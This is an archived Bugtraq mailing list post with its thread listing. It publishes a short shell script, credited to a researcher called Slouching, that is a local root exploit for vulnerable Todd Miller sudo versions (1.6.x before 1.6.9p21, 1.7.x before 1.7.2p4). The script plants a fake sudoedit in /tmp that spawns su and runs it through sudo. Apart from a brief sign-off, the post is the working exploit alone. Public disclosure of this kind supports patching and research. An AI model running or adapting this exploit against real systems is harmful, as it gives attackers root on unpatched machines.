Bugtraq mailing list archives
Todd Miller Sudo local root exploit discovered by Slouching
From: Kingcope <kcope2 () googlemail com>
Date: Tue, 02 Mar 2010 00:08:44 +0100
Just for the record. ---snip--- #!/bin/sh # Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4 # local root exploit # March 2010 # automated by kingcope # Full Credits to Slouching echo Tod Miller Sudo local root exploit echo by Slouching echo automated by kingcope if [ $# != 1 ] then echo "usage: ./sudoxpl.sh <file you have permission to edit>" exit fi cd /tmp cat > sudoedit << _EOF #!/bin/sh echo ALEX-ALEX su /bin/su /usr/bin/su _EOF chmod a+x ./sudoedit sudo ./sudoedit $1 --snip--- cheers, kingcope
Current thread:
- Todd Miller Sudo local root exploit discovered by Slouching Kingcope (Mar 02)
- Re: Todd Miller Sudo local root exploit discovered by Slouching andy (Mar 03)
- Re: Todd Miller Sudo local root exploit discovered by Slouching Kingcope (Mar 03)
- Re: Todd Miller Sudo local root exploit discovered by Slouching Jann Horn (Mar 03)
- <Possible follow-ups>
- Re: Re: Todd Miller Sudo local root exploit discovered by Slouching noone (Mar 04)
- Re: Todd Miller Sudo local root exploit discovered by Slouching Steve Shockley (Mar 05)
- Re: Todd Miller Sudo local root exploit discovered by Slouching andy (Mar 03)